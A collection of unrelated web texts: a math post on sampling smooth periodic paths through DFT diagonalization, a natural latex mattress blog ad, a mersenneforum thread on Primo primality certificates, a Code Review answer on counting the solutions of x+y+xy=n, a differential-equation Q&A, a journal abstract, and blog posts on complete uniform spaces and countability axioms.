Let $Y$ denote the matrix which corresponds to circular convolution with a signal $y$. Here the $F$ matrix computes the DFT in the same way as the function fft() in numpy. Note that this matrix is not unitary but instead satisfies For convenience, let us define $U = \frac{1}{\sqrt{N}} F$ so that $U^{-1} = U^{\ast}$ and the diagonalization can be expressed: Now we can use this to diagonalize the finite difference matrix: where $d_{1} = (-1, 1, 0, \dots, 0)$. The Gram matrix becomes Finally, the entire precision matrix $\Lambda$ can therefore be diagonalized $\Lambda = U^{\ast} \operatorname{diag}(\lambda) U$ where Note that $F \delta = 1$. Incidentally, since $d_2 = d_1 \star d_1$, we see that $F d_{2} = (F d_{1})^2$ and therefore $\lvert F d_{2} \rvert^2 = \lvert F d_{1} \rvert^4$. Therefore, to sample from the distribution $\mathcal{N}(0, \Lambda^{-1})$, it seems that we could use the matrix But wait, something seems wrong here. The precision matrix $\Lambda$ is symmetric positive-definite and yet the eigenvectors in $U$ are complex? In order to obtain samples $x = A \epsilon$, we need a real factorization $\Sigma = A A^{T}$. Real diagonalization What’s happened here is that some eigenvalues occur twice and therefore the eigenvectors are not unique: we can take any (complex) rotation of two eigenvectors with the same eigenvalue and they are still unit-norm eigenvectors of the same matrix. It should be possible to mix these eigenvectors in a way that makes them real. Recall that the Fourier transform of a real-valued signal has conjugate symmetry. We can immediately observe that the transform $\lambda$ possesses real symmetry since it is obtained from the magnitude of a transform with conjugate symmetry. Therefore the identical eigenvalues occur at $\lambda[k]$ and $\lambda[N - k]$. From the diagonalization $\Lambda = U^{\ast} \operatorname{diag}(\lambda) U$ we can see that the eigenvalues correspond to rows of $U$. 
Happily, the rows of $U$ possess conjugate symmetry. Recall from the definition of the DFT matrix $F$ (which is related to the unitary matrix $U$ by a scalar) that element $s, t$ of the DFT matrix is $F_{s, t} = \omega_{N}^{s t}$ where $\omega_{N} = \exp(i 2 \pi / N)$. Using the fact that $\omega_{N}^{n} = \omega_{N}^{n \bmod N}$ we see the symmetry in the rows of $F$: There are two special cases. For $s = 0$, we have $F_{s, t} = \omega_{N}^{0} = 1$, which is already real. For $s = N / 2$ (only when $N$ is even), we have $F_{s, t} = \omega_{N}^{(N/2) t} = (-1)^{t}$, which is also already real.

Therefore we propose to introduce an orthonormal complex matrix $Q$ such that $V = Q U$ is real and therefore $V^{T} = V^{\ast} = V^{-1}$. Let $U_{k}$ denote row $k$ of the matrix $U$. Let $Q_{k}$ denote the submatrix of elements $\{k, N - k\} \times \{k, N - k\}$ of the matrix $Q$. If we let $Q_{k}$ take the form then we see that which is real. To preserve orthogonality, we choose $\alpha = \beta = \frac{1}{\sqrt{2}}$. This will have no effect on the eigenvalues since Overall our $Q$ matrix takes the form Finally, we have our real $A = U^{\ast} Q^{\ast} \operatorname{diag}(\lambda^{-\frac{1}{2}})$. Since $U^{\ast} = \frac{1}{\sqrt{N}} F^{\ast} = \sqrt{N} F^{-1}$, samples can be obtained Note that the operation $Q^{\ast}$ can be implemented as follows When $h$ is real and symmetric (as above), this is equivalent to

Here are a few samples from this distribution. I often use $\alpha = 0$ and $\beta \in [10^3, 10^6]$. Note that, since the paths are constrained to be periodic, shorter paths may be tightly clustered. Of course, if we want to generate non-periodic paths, we can generate a periodic path of a larger size and then truncate it.
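The frequency-domain recipe above can be sketched in a few lines of NumPy. Note this is my own reading of the post, not the author's notebook code: the post's display equation defining the precision in terms of $\Lambda_1$ and $\Lambda_2$ did not survive extraction, so I assume the form $\Lambda = I + \alpha \Lambda_1 + \beta \Lambda_2$ (the identity term keeps the DC mode bounded), and constant factors are not tracked carefully.

```python
import numpy as np

def sample_smooth_path(n, alpha=0.0, beta=1e4, rng=None):
    """Draw one periodic smooth path of length n (a sketch; see assumptions above)."""
    rng = np.random.default_rng() if rng is None else rng
    k = np.arange(n)
    # |F d1|^2 for the circular first-difference kernel d1 = (-1, 1, 0, ..., 0)
    fd1_sq = 2.0 - 2.0 * np.cos(2.0 * np.pi * k / n)
    # Assumed precision Lambda = I + alpha*Lambda_1 + beta*Lambda_2, whose
    # circulant eigenvalues are 1 + alpha*|F d1|^2 + beta*|F d1|^4.
    lam = 1.0 + alpha * fd1_sq + beta * fd1_sq ** 2
    # Shape complex white noise by lambda^{-1/2} in the frequency domain;
    # taking the real part enforces the conjugate symmetry discussed above.
    eps = rng.standard_normal(n) + 1j * rng.standard_normal(n)
    return np.sqrt(n) * np.real(np.fft.ifft(eps / np.sqrt(lam)))
```

Larger $\beta$ suppresses the high-frequency eigenmodes more strongly, so the same noise draw produces a visibly smoother path.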
http://www.healthyfoundations.com/blog/?p=1204
# A Natural Latex Mattress is Completely Recyclable

Are you thinking about a natural latex mattress and all the benefits it can provide? A 100% all-natural latex mattress is hypoallergenic, antimicrobial, and dust mite-free. It is also extremely comfortable. If those are not enough great reasons to think about an all-natural latex mattress, here is one more... Since an all-natural latex mattress is completely botanical and made from the sap of a rubber tree, it is completely recyclable. That is another great benefit of a natural latex mattress. A natural latex mattress has a lot of great benefits, but it is important to understand that a lot of latex that is being labeled as "natural" is actually man-made or synthetic latex. Many companies call their mattress a natural latex mattress when it actually has just a small amount of natural latex and the rest of the latex is synthetic or man-made. This distinction is often purposely vague and unclear. If you really want to make sure the natural latex mattress you are interested in is all natural, ask if there is any synthetic latex in it. If you want the unique qualities and comfort of a natural latex mattress, remember that it also has the unique ability to be completely recycled and is a great green alternative to other mattresses.
https://mersenneforum.org/showthread.php?s=ea96a77cec8e393157efa64f1a37009d&p=598464
mersenneforum.org Primo

2022-01-02, 01:39 #166 Jayder: Is anybody currently working on the PRPs <= 3000? I may do a little or a lot of work, and I don't want to run into anyone.

2022-01-02, 18:01 #167 chris2be8: I'm working on them from the bottom up. If you keep away from the lowest few hundred PRPs you should be OK (anything over 1500 digits should be safe for at least a month).

2022-01-20, 19:30 #168 kruoli: Currently, I am running a certification on Sm(2445)*10^8677+Smr(2446). While the system I am running it on has a throughput of slightly above one 10k-digit number per day, it now stands at 46806/57633 bits in phase 1 after more than a week (slightly above eight days). This is with the same number of threads as with the 10k candidates. Even if I assume that Primo operates in $$\mathcal{O}(\log(n)^{5+\varepsilon})$$ for small $$\varepsilon$$ instead of $$\mathcal{O}(\log(n)^{4+\varepsilon})$$, this seems way slower than should be expected. Is my expectation flawed (maybe I computed the ETA wrong), or is there something else that could slow it down? I know that ECPP is a non-deterministic algorithm and I might have got an extreme sample here. Can somebody chime in if this might be the case?

2022-01-20, 19:39 #169 paulunderwood: Quote: Originally Posted by kruoli — Currently, I am running a certification on Sm(2445)*10^8677+Smr(2446). While the system I am running it on has a throughput of slightly above one 10k-digit number per day, it now stands at 46806/57633 bits in phase 1 after more than a week (slightly above eight days). This is with the same number of threads as with the 10k candidates.
Even if I assume that Primo operates in $$\mathcal{O}(\log(n)^{5+\varepsilon})$$ for small $$\varepsilon$$ instead of $$\mathcal{O}(\log(n)^{4+\varepsilon})$$, this seems way slower than should be expected. Is my expectation flawed (maybe I computed the ETA wrong), or is there something else that could slow it down? I know that ECPP is a non-deterministic algorithm and I might have got an extreme sample here. Can somebody chime in if this might be the case?

I found log^4 is a good rule of thumb. Have you selected max settings on the certification page? 11k dd? (?). Things will speed up! I know it can be disheartening to watch it backtrack. A watched kettle never boils!

2022-01-20, 19:41 #170 kruoli: Yes, I used 11k digits and the maximum setting in the other field. Watching it is only fun when it has sped up considerably towards the end of phase 1.

2022-01-21, 05:38 #171 Batalov: Quote: Originally Posted by kruoli — Watching it is only fun when... ...you pressed the button "Start". Your job was already done then. Unless you also watch the paint dry. (assuming you ever painted walls)

2022-02-17, 16:39 #172 chris2be8: @Ray Chandler, would you mind moving to slightly larger numbers? My script has reached 1519 digits and I've seen it try to process some numbers you had just submitted certificates for. It would avoid the bad case of us both generating certificates for the same number at the same time.

2022-02-19, 03:25 #174 EdH: Did you unpack them first? Did they look like:

Code:
[PRIMO - Primality Certificate]
Version=4.3.0 - LX64
WebSite=http://www.ellipsa.eu/
Format=4
ID=B3F5C051930D8
Created=Feb-26-2019 11:45:39 PM
TestCount=321
Status=Candidate certified prime
Put here any comment...
[Running Times (Wall-Clock)]
1stPhase=6709s
2ndPhase=1902s
Total=8611s
[Running Times (Processes)]
1stPhase=24918s
2ndPhase=7447s
Total=32365s
[Candidate]
. . .

2022-02-19, 03:40 #175 sweety439: Quote: Originally Posted by EdH — Did you unpack them first? Did they look like:

Code:
[PRIMO - Primality Certificate]
Version=4.3.0 - LX64
WebSite=http://www.ellipsa.eu/
Format=4
ID=B3F5C051930D8
Created=Feb-26-2019 11:45:39 PM
TestCount=321
Status=Candidate certified prime
[Comments]
Put here any comment...
[Running Times (Wall-Clock)]
1stPhase=6709s
2ndPhase=1902s
Total=8611s
[Running Times (Processes)]
1stPhase=24918s
2ndPhase=7447s
Total=32365s
[Candidate]
. . .

I unpacked the .gz files and found a folder containing a .certif file; I changed the ".certif" to ".zip" and uploaded them to factordb.

2022-02-19, 04:20 #176 paulunderwood: Quote: Originally Posted by sweety439 — I unpacked the .gz files and found a folder containing a .certif file; I changed the ".certif" to ".zip" and uploaded them to factordb.

gunzip the .gz files. Then zip the .certif up to .zip. No need to rename anything.
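paulunderwood's "log^4 is a good rule of thumb" can be sanity-checked in a few lines. The helper below is purely illustrative (not a forum tool): it rescales a known runtime by digit count, since log n is proportional to the number of digits, and takes the exponent as a parameter so the log^4 and log^5 assumptions can be compared side by side.

```python
def scaled_runtime(known_time, known_digits, target_digits, exponent=4):
    """Estimate ECPP runtime at a new size, assuming cost ~ digits^exponent."""
    return known_time * (target_digits / known_digits) ** exponent

# One day per 10k-digit candidate, scaled to a 57633-bit number
# (57633 * log10(2) is roughly 17349 decimal digits):
eta_log4 = scaled_runtime(1.0, 10000, 17349)     # about 9.1 days
eta_log5 = scaled_runtime(1.0, 10000, 17349, 5)  # about 15.7 days
```

Under the log^4 rule the quoted run would be expected to take on the order of nine days total, so spending eight days partway through phase 1 is indeed slower than the rule of thumb predicts.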
https://codereview.stackexchange.com/questions/83464/counting-the-positive-integer-solutions-of-an-equation
# Counting the positive integer solutions of an equation

I have to solve this equation: $x + y + xy = n$

    #include <iostream>
    #include <cstring>
    using namespace std;

    long c;

    int main() {
        long x = 0;
        cin >> c;
        if (c == 0) {
            cout << 1 << endl;
            return 0;
        }
        for (long i = 1; i <= c / 2; i++) {
            for (long j = 1; j <= c; j++)
                if (i + j + i * j == c) {
                    x++;
                    break;
                }
        }
        cout << x + 2 << endl;
    }

Of course this code is very slow. How can I find the number of solutions in a faster way? Maybe there is a specific algorithm?

• How do you expect to "solve" that equation? It has an infinite number of solutions; which of the solutions do you want to return? Mar 7 '15 at 12:34

(Remark: The question mentions "positive number of solutions", but from your code I assume that you meant "number of non-negative integer solutions".)

Coding style:
• #include <cstring> is not needed here.
• Don't use namespace std;, see for example Why is "using namespace std;" considered bad practice?.
• long c; is only used in main(), so there is no need at all to declare it as a global variable.
• Always use braces { ... } for the body of for- and if-statements, even if it has only one statement. It helps to avoid errors if additional statements are added later.
• Move the computation of the number of solutions to a separate function. This keeps the main function small and is convenient if you add test cases.
• I prefer a different spacing in for- and if-statements, but that may be a matter of taste.
• Variable names: If the equation is given as $x + y + xy = n$, then why not use the same names in your program? And x is a quite non-descriptive name for a number of solutions.
• It may not be immediately obvious why 2 is added to the number of solutions, so an explaining comment would be appropriate here.

Then your code would look like this:

    #include <iostream>

    // Number of non-negative integer solutions to
    //     x + y + x * y == n .
    long numberOfSolutions(long n) {
        if (n == 0) {
            return 1;
        }
        // Count all positive solutions:
        long count = 0;
        for (long x = 1; x <= n / 2; x++) {
            for (long y = 1; y <= n; y++) {
                if (x + y + x * y == n) {
                    count++;
                    break;
                }
            }
        }
        // Add 2 for the solutions x=0,y=n and x=n,y=0:
        return count + 2;
    }

    int main() {
        long n;
        std::cin >> n;
        std::cout << numberOfSolutions(n) << std::endl;
    }

Performance: Your code tries all possible combinations of x, y to find solutions and therefore runs in $O(n^2)$. A small improvement could be to use the symmetry of the problem, i.e. enumerate only pairs with x <= y:

    for (long x = 1; x <= n / 2; x++) {
        for (long y = x; y <= n; y++) {
            if (x + y + x * y == n) {
                // Counts as 2 solutions if x != y:
                count = count + 1 + (x != y);
                break;
            }
        }
    }

This cuts the total number of iterations down by a factor of 2, but it is still $O(n^2)$.

Better algorithm: If you write your equation as $$n + 1 = x + y + xy + 1 = (x + 1)(y + 1)$$ then it becomes obvious that it can be solved by determining the number of divisors of $n+1$. This is known as the Divisor function and can be computed efficiently. Even the simplest implementation

    long numberOfDivisors(long n) {
        long count = 0;
        for (long j = 1; j <= n; j++) {
            if (n % j == 0) {
                count++;
            }
        }
        return count;
    }

runs in $O(n)$ instead of $O(n^2)$. More sophisticated methods use the prime factorization of $n$.
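Following up on that last remark: even without the prime factorization, trial division only needs to run up to $\sqrt{n}$, because divisors come in pairs $(j, n/j)$. A sketch of this intermediate speedup (written in Python rather than the answer's C++, purely for brevity):

```python
def count_divisors(n):
    """Count the divisors of n by trial division up to sqrt(n)."""
    count = 0
    j = 1
    while j * j <= n:
        if n % j == 0:
            # j and n // j form a divisor pair; count once when j*j == n
            count += 1 if j * j == n else 2
        j += 1
    return count

def count_solutions(n):
    """Non-negative integer solutions of x + y + x*y == n, via (x+1)(y+1) == n+1."""
    return count_divisors(n + 1)
```

This runs in $O(\sqrt{n})$ and also handles the n == 0 case without special treatment, since n + 1 = 1 has exactly one divisor.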
http://mathcentral.uregina.ca/QQ/database/QQ.09.12/h/andreea1.html
Math Central Quandaries & Queries

Hi. I don't speak a lot of English, but here is my question; I hope you understand: f(x) + f''''(x) = 0. So, my question: what is f(x), where f''''(x) is f(x) differentiated four times? I tried to find the answer, and I thought f(x) is something like f(x) = e^x sin x, but something is missing. I don't know.

Hello Andrea,

To solve this problem we need to have an understanding of solving high-order homogeneous linear differential equations, and specifically the case of complex roots. If we re-write the question $f(x) + f''''(x) = 0$ in the form $y^{(4)} + y = 0,$ we can see that this is a fourth-order linear differential equation. Therefore, we can assume that the solutions will be of the form $y(x) = e^{rx}.$ To find the value(s) of $r$ we must set up the characteristic equation for this differential equation, which is $r^4 + 1 = 0,$ with $r = (-1)^{1/4}.$ To finish solving the problem we need to be able to evaluate the four fourth roots of $-1.$

METHOD 1

To do this we must recall how to solve characteristic equations of the form $r^n - a = 0.$ We use the fact that $a$ in polar form is $a = R(e^{i \alpha}),$ where $R = |a|,$ and where $\alpha = 0$ when $a > 0,$ and $\alpha = \pi$ when $a < 0.$ From Euler's formula $e^{i \theta} = \cos \theta + i \sin \theta,$ we can conclude that $e^{i2k \pi} = 1$, with $k = 0, 1, 2, 3, \ldots$ From that we can conclude that $a = R(e^{i(\alpha+2k \pi)})$ and $a^{1/n} = R^{1/n}(e^{i(\alpha+2k \pi)/n}),$ with $k = 0, 1, 2, 3, \ldots, n - 1.$

Applying this formula to our situation we have $r^4 - (-1) = 0,$ so $a = -1,$ $R = 1,$ and $\alpha = \pi$ since $a < 0.$ Using the formula $a^{1/n} = R^{1/n}(e^{i(\alpha+2k \pi)/n})$ with $n = 4,$ we use this and Euler's formula to find the four roots $(k = 0, 1, 2, 3).$

METHOD 2

If we solve the quartic equation $r^4 + 1 = 0,$ we end up getting 4 different complex roots.
These roots are $\pm \sqrt i$ and $\pm i \sqrt i.$ In order to simplify this and use our complex-roots general solution for differential equations, we need to be able to evaluate $\sqrt i$. To do this we can use Euler's formula $e^{i \theta} = \cos \theta + i \sin \theta.$ Plugging in $\theta = \frac{\pi}{2},$ we get that $e^{i \frac{\pi}{2}} = i,$ which means that $\sqrt i = i^{1/2} = \left( e^{i \frac{\pi}{2}} \right)^{\frac12} = e^{i \frac{\pi}{4}}$. Evaluating this back in Euler's formula we get that $\sqrt i = e^{i \frac{\pi}{4}} = \cos\left( \frac{\pi}{4}\right) + i \sin\left( \frac{\pi}{4}\right),$ which gives us the result that $\sqrt i = \frac{1+i}{\sqrt 2}.$ Using this fact we can determine the complex values of the other three roots. Once we have our four roots we can write our general solution to the homogeneous problem. Since there are four roots, there will be 4 different terms in our solution.

Hope this helps.
Brennan Yaremko

Math Central is supported by the University of Regina and The Pacific Institute for the Mathematical Sciences.
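Carrying either method through to the end (the reply above stops short of the final formula, so treat this as an editorial completion): the four fourth roots of $-1$ are $\frac{\pm 1 \pm i}{\sqrt 2}$, and pairing each complex root with its conjugate gives the real general solution

```latex
% roots: r = \tfrac{1}{\sqrt 2}(\pm 1 \pm i), i.e. real part \pm\tfrac{1}{\sqrt 2},
% imaginary part \pm\tfrac{1}{\sqrt 2}
f(x) = e^{x/\sqrt{2}}\Bigl(c_1 \cos\tfrac{x}{\sqrt{2}} + c_2 \sin\tfrac{x}{\sqrt{2}}\Bigr)
     + e^{-x/\sqrt{2}}\Bigl(c_3 \cos\tfrac{x}{\sqrt{2}} + c_4 \sin\tfrac{x}{\sqrt{2}}\Bigr)
```

which is consistent with the asker's hunch that $f(x)$ looks like $e^x \sin x$, up to the factor of $\frac{1}{\sqrt 2}$ in both the exponent and the frequency.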
# On the Best Approximation in the Mean by Algebraic Polynomials with Weight and the Exact Values of Widths for the Classes of Functions Abstract The exact value of the extremal characteristic is obtained on the class $L_2^r(D_\rho)$, where $r \in \mathbb{Z}_+$; ${D}_{\rho} = \sigma(x)\frac{d^2}{dx^2} + \tau(x)\frac{d}{dx}$, $\sigma$ and $\tau$ are polynomials of at most the second and first degrees, respectively, $\rho$ is a weight function, $0 < p \le 2$, $0 < h < 1$, $\lambda_n(\rho)$ are the eigenvalues of the operator $D_\rho$, $\varphi$ is a nonnegative measurable and summable function (on the interval $(a, b)$) which is not equivalent to zero, $\Omega_{k,\rho}$ is the generalized modulus of continuity of the $k$th order in the space $L_{2,\rho}(a, b)$, and $E_n(f)_{2,\rho}$ is the best polynomial approximation in the mean with weight $\rho$ for a function $f \in L_{2,\rho}(a, b)$. The exact values of widths for the classes of functions specified by the characteristic of smoothness $\Omega_{k,\rho}$ and the $K$-functional $\mathbb{K}_m$ are also obtained. English version (Springer): Ukrainian Mathematical Journal 65 (2013), no. 12, pp. 1774–1792. Citation Example: Shvachko A. V., Vakarchuk S. B. On the Best Approximation in the Mean by Algebraic Polynomials with Weight and the Exact Values of Widths for the Classes of Functions // Ukr. Mat. Zh. - 2013. - 65, № 12. - pp. 1604–1621.
The Unapologetic Mathematician Complete Uniform Spaces Okay, in a uniform space we have these things called “Cauchy nets”, which are ones where the points of the net are getting closer and closer to each other. If our space is sequential — usually a result of assuming it to be first- or second-countable — then we can forget the more complicated nets and just consider Cauchy sequences. In fact, let’s talk as if we’re looking at a sequence to build up an intuition here. Okay, so a sequence is Cauchy if no matter what entourage we pick to give a scale of closeness, there’s some point along our sequence where all of the remaining points are at least that close to each other. If we pick a smaller entourage we might have to walk further out the sequence, but eventually every point will be at least that close to all the points beyond it. So clearly they’re all getting pressed together towards a limit, right? Unfortunately, no. And we have an example at hand of where it can go horribly, horribly wrong. The rational numbers $\mathbb{Q}$ are an ordered topological group, and so they have a uniform structure. We can give a base for this topology consisting of all the rays $(a,\infty)=\{x\in\mathbb{Q}|a<x\}$, the rays $(-\infty,a)=\{x\in\mathbb{Q}|x<a\}$, and the intervals $(a,b)=\{x\in\mathbb{Q}|a<x<b\}$, which is clearly countable and thus makes $\mathbb{Q}$ second-countable, and thus sequential. Okay, I’ll take part of that back. This is only “clear” if you know a few things about cardinalities which I’d thought I’d mentioned but it turns out I haven’t. It was also pointed out that I never said how to generate an equivalence relation from a simpler relation in a comment earlier. I’ll wrap up those loose ends shortly, probably tomorrow. Back to the business at hand: we can now just consider Cauchy sequences, instead of more general Cauchy nets.
Also we can explicitly give entourages that comprise a base for the uniform structure, which is all we really need to check the Cauchy condition: $E_a=\{(x,y)\in\mathbb{Q}\times\mathbb{Q}|\left|x-y\right|<a\}$. I did do absolute values, didn’t I? So a sequence $x_i$ is Cauchy if for every rational number $a$ there is an index $N$ so that for all $i\geq N$ and $j\geq N$ we have $\left|x_i-x_j\right|<a$. We also have a neighborhood base $\mathcal{B}(q)$ for each rational number $q$ given by the basic entourages. For each rational number $r$ we have the neighborhood $\{x\in\mathbb{Q}|\left|x-q\right|<r\}$. These are all we need to check convergence. That is, a sequence $x_i$ of rational numbers converges to $q$ if for all rational $r$ there is an index $N$ so that for all $i\geq N$ we have $\left|x_i-q\right|<r$. And finally: for each natural number $n\in\mathbb{N}$ there are only finitely many square numbers less than $2n^2$. We’ll let $a_n^2$ be the largest such number, and consider the rational number $x_n=\frac{a_n}{n}$. We can show that this sequence is Cauchy, but it cannot converge to any rational number. In fact, if we had such a thing this sequence would be trying to converge to the square root of two. The uniform space $\mathbb{Q}$ is shot through with holes like this, making tons of examples of Cauchy sequences which “should” converge, but don’t. And this is all just in one little uniform space! Clearly Cauchy nets don’t converge in general. But we dearly want them to. If we have a uniform space in which every Cauchy sequence does converge, we call it “complete”. Categorically, a complete uniform space is sort of like an abelian group. The additional assumption is an extra property which we may forget when convenient. That is, we have a category $\mathbf{Unif}$ of uniform spaces and a full subcategory $\mathbf{CUnif}$ of complete uniform spaces.
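The sequence $x_n = a_n/n$ built above can be computed exactly. A sketch, with Python's `Fraction` standing in for $\mathbb{Q}$:

```python
from fractions import Fraction
from math import isqrt

def x(n):
    # a_n^2 is the largest square below 2n^2 (2n^2 itself is never a
    # perfect square, since sqrt(2) is irrational), so a_n = floor(n*sqrt(2)).
    return Fraction(isqrt(2 * n * n), n)

seq = [x(n) for n in range(1, 2001)]

# Cauchy: every term with n > 1500 lies in (sqrt(2) - 1/1501, sqrt(2)),
# so any two of them differ by less than 1/1501 < 1/1000.
tail = seq[1500:]
assert max(tail) - min(tail) < Fraction(1, 1000)

# ...but there is no rational limit: the squares approach 2, and x^2 = 2
# has no solution in Q.
assert abs(seq[-1] ** 2 - 2) < Fraction(1, 500)
assert all(q ** 2 != 2 for q in seq)
```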
The inclusion functor of the subcategory is our forgetful functor, and we’d like an adjoint to this functor which assigns to each uniform space $X$ its “completion” $\overline{X}$. This will contain $X$ as a dense subspace — the closure $\mathrm{Cl}(X)$ in $\overline{X}$ is the whole of $\overline{X}$ — and will satisfy the universal property that if $Y$ is any other complete uniform space and $f:X\rightarrow Y$ is a uniformly continuous map, then there is a unique uniformly continuous $\bar{f}:\overline{X}\rightarrow Y$ extending $f$. To construct such a completion, we’ll throw in the additional assumption that $X$ is second-countable so that we only have to consider Cauchy sequences. This isn’t strictly necessary, but it’s convenient and gets the major ideas across. I’ll leave you to extend the construction to more general uniform spaces if you’re interested. What we want to do is identify Cauchy sequences in $X$ — those which should converge to something in the completion — with their limit points in the completion. But more than one sequence might be trying to converge to the same point, so we can’t just take all Cauchy sequences as points. So how do we pick out which Cauchy sequences should correspond to the same point? We’ll get at this by defining what the uniform structure (and thus the topology) should be, and then see which points have the same neighborhoods. Given an entourage $E$ of $X$ we can define an entourage $\overline{E}$ as the set of those pairs of sequences $(x_i,y_j)$ where there exists some $N$ so that for all $i\geq N$ and $j\geq N$ we have $(x_i,y_j)\in E$. That is, the sequences which get eventually $E$-close to each other are considered $\overline{E}$-close. Now two sequences will be equivalent if they are $\overline{E}$-close for all entourages $E$ of $X$. We can identify these sequences and define the points of $\overline{X}$ to be these equivalence classes of Cauchy sequences. 
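The identification of Cauchy sequences just described can be made concrete. A sketch (checking only the metric entourages $E_a$, which suffice as a base for $\mathbb{Q}$): two different Cauchy sequences approaching the same "hole" from opposite sides are eventually $\overline{E}_a$-close for each $a$, and so name a single point of the completion.

```python
from fractions import Fraction
from math import isqrt

# Two distinct Cauchy sequences aiming at the same missing point sqrt(2):
# one from below, one from above.
below = [Fraction(isqrt(2 * n * n), n) for n in range(1, 1001)]
above = [q + Fraction(1, n) for n, q in enumerate(below, start=1)]

# For each entourage E_a, the pair of sequences lies in the corresponding
# entourage on sequences: eventually all cross terms are E_a-close.
for a in [Fraction(1, 10), Fraction(1, 100)]:
    N = int(2 / a) + 1   # past this index both tails are within a/2 of sqrt(2)
    assert all(abs(below[i] - above[j]) < a
               for i in range(N, 1000, 57)    # sampled indices, for speed
               for j in range(N, 1000, 57))
```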
The entourages $\overline{E}$ descend to define entourages on $\overline{X}$, thus defining it as a uniform space. It contains $X$ as a uniform subspace if we identify $x\in X$ with (the equivalence class of) the constant sequence $x, x, x, ...$. It’s straightforward to show that this inclusion map is uniformly continuous. We can also verify that the second-countability of $X$ lifts up to $\overline{X}$. Now it also turns out that $\overline{X}$ is complete. Let’s consider a sequence of Cauchy sequences $(x_k)_i$. This will be Cauchy if for all entourages $\overline{E}$ there is an $\bar{N}$ so that if $i\geq\bar{N}$ and $j\geq\bar{N}$ the pair $((x_k)_i,(x_k)_j)$ is in $\overline{E}$. That is, there is an $N_{i,j}$ so that for $k\geq N_{i,j}$ and $l\geq N_{i,j}$ we have $((x_k)_i,(x_l)_j)\in E$. We can’t take the limits in $X$ of the individual Cauchy sequences $(x_k)_i$ — the limits along $k$ — but we can take the limits along $i$! This will give us another Cauchy sequence, which will then give a limit point in $\overline{X}$. As for the universal property, consider a uniformly continuous map $f:X\rightarrow Y$ to a complete uniform space $Y$. Then every point $\bar{x}$ in $\overline{X}$ comes from a Cauchy sequence $x_i$ in $X$. Being uniformly continuous, $f$ will send this to a Cauchy sequence $f(x_i)$ in $Y$, which must then converge to some limit $\bar{f}(\bar{x})\in Y$ since $Y$ is complete. On the other hand, if $x_i'$ is another representative of $\bar{x}$ then the uniform continuity of $f$ will force $\lim f(x_i)=\lim f(x_i')$, so $\bar{f}$ is well-defined. It is unique because there can be only one continuous function on $\overline{X}$ which agrees with $f$ on the dense subspace $X$. So what happens when we apply this construction to the rational numbers $\mathbb{Q}$ in an attempt to patch up all those holes and make all the Cauchy sequences converge? At long last we have the real numbers $\mathbb{R}$! 
Or, at least, we have the underlying complete uniform space. What we don’t have is any of the field properties we’ll want for the real numbers, but we’re getting close to what every freshman in calculus thinks they understand. November 29, 2007 Countability Axioms Now I want to toss out a few assumptions that, if they happen to hold for a topological space, will often simplify our work. There are a lot of these, and the ones that I’ll mention I’ll dole out in small, related collections. Often we will impose one of these assumptions and then just work in the subcategory of $\mathbf{Top}$ of spaces satisfying them, so I’ll also say a few things about how these subcategories behave. Often this restriction to “nice” spaces will end up breaking some “nice” properties about $\mathbf{Top}$, and Grothendieck tells us that it’s often better to have a nice category with some bad objects than to have a bad category with only nice objects. Still, the restrictions can come in handy. First I have to toss out the concept of a neighborhood base, which is for a neighborhood filter like a base for a topology. That is, a collection $\mathcal{B}(x)\subseteq\mathcal{N}(x)$ of neighborhoods of a point $x$ is a base for the neighborhood filter $\mathcal{N}(x)$ if for every neighborhood $N\in\mathcal{N}(x)$ there is some neighborhood $B\in\mathcal{B}(x)$ with $B\subseteq N$. Just like we saw for a base of a topology, we only need to check the definition of continuity at a point $x$ on a neighborhood base at $x$. Now we’ll say that a topological space is “first-countable” if each neighborhood filter has a countable base. That is, the sets in $\mathcal{B}(x)$ can be put into one-to-one correspondence with some subset of the natural numbers $\mathbb{N}$. We can take this collection of sets in the order given by the natural numbers: $B_i$. Then we can define $U_0=B_0$, $U_1=U_0\cap B_1$, and in general $U_n=U_{n-1}\cap B_n$. 
This collection $U_i$ will also be a countable base for the neighborhood filter, and it satisfies the extra property that $m\geq n$ implies that $U_m\subseteq U_n$. From this point we will assume that our countable base is ordered like this. Why does it simplify our lives to only have a countable neighborhood base at each point? One great fact is that a function $f:X\rightarrow Y$ from a first-countable space $X$ will be continuous at $x$ if each neighborhood $V\in\mathcal{N}_Y(f(x))$ contains the image of some neighborhood $U\in\mathcal{N}_X(x)$. But $U$ must contain a set from our countable base, so we can just ask if there is an $i\in\mathbb{N}$ with $f(B_i)\subseteq V$. We also picked the $B_i$ to nest inside of each other. Why? Well we know that if $f$ isn’t continuous at $x$ then we can construct a net $x_\alpha\in X$ that converges to $x$ but whose image doesn’t converge to $f(x)$. But if we examine our proof of this fact, we can look only at the base $B_i$ and construct a sequence that converges to $x$ and whose image fails to converge to $f(x)$. That is, a function from a first-countable space is continuous if and only if $\lim f(x_i)=f(\lim x_i)$ for all sequences $x_i\in X$, and sequences are a lot more intuitive than general nets. When this happens we say that a space is “sequential”, and so we have shown that every first-countable space is sequential. Every subspace of a first-countable space is first-countable, as is every countable product. Thus the subcategory of $\mathbf{Top}$ consisting of first-countable spaces has all countable limits, or is “countably complete”. Disjoint unions of first-countable spaces are also first-countable, so we still have coproducts, but quotients of first-countable spaces may only be sequential. On the other hand, there are sequential spaces which are not first-countable whose subspaces are not even sequential, so we can’t just pass to the subcategory of sequential spaces to recover colimits.
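The nesting trick $U_n = U_{n-1}\cap B_n$ is easy to watch in a toy model. A sketch where the countable base at $0$ is a family of open intervals in no particular order (the intervals themselves are made up for illustration):

```python
import random

random.seed(0)
# A countable neighborhood base at 0: open intervals (lo, hi) with
# lo < 0 < hi, in no particular order of size.
B = [(-random.uniform(0.1, 2.0), random.uniform(0.1, 2.0)) for _ in range(50)]

# U_0 = B_0, and U_n = U_{n-1} ∩ B_n.
U = [B[0]]
for lo, hi in B[1:]:
    U.append((max(U[-1][0], lo), min(U[-1][1], hi)))

for m in range(1, len(U)):
    # Each U_m is still a neighborhood of 0, sits inside B_m,
    # and nests inside U_{m-1}.
    assert U[m][0] < 0 < U[m][1]
    assert U[m][0] >= B[m][0] and U[m][1] <= B[m][1]
    assert U[m][0] >= U[m - 1][0] and U[m][1] <= U[m - 1][1]
```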
